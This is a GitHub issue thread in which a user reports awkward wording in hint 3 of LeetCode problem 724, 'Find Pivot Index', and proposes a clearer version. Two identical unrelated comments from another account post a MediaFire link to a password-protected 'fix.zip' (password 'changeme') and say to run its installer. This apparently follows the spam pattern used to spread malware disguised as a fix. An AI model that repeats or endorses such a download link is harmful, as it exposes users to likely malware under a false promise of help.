### ISSUE TITLE
Grammatical Error - 724. Find Pivot Index

### ISSUE THREAD

**Issue by ejini6969** [LeetCode-Feedback/LeetCode-Feedback#23707]
### LeetCode Username

https://leetcode.com/u/ejini6969/

### Problem Number, Title, and Link

[724. Find Pivot Index](https://leetcode.com/problems/find-pivot-index/)

### Bug Category

Problem hints

### Bug Description

According to hint 3:

> For each index i, check if sumLeft[i] equals sumRight[i] return i. If no i found, return -1.

Should be re-worded to

> For each index i, check if sumLeft[i] equals sumRight[i]. If so, return i. If no i found, return -1.

### Language Used for Code

None

### Expected behavior

A clearer hint is pivotal in helping users to derive solution to a problem.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
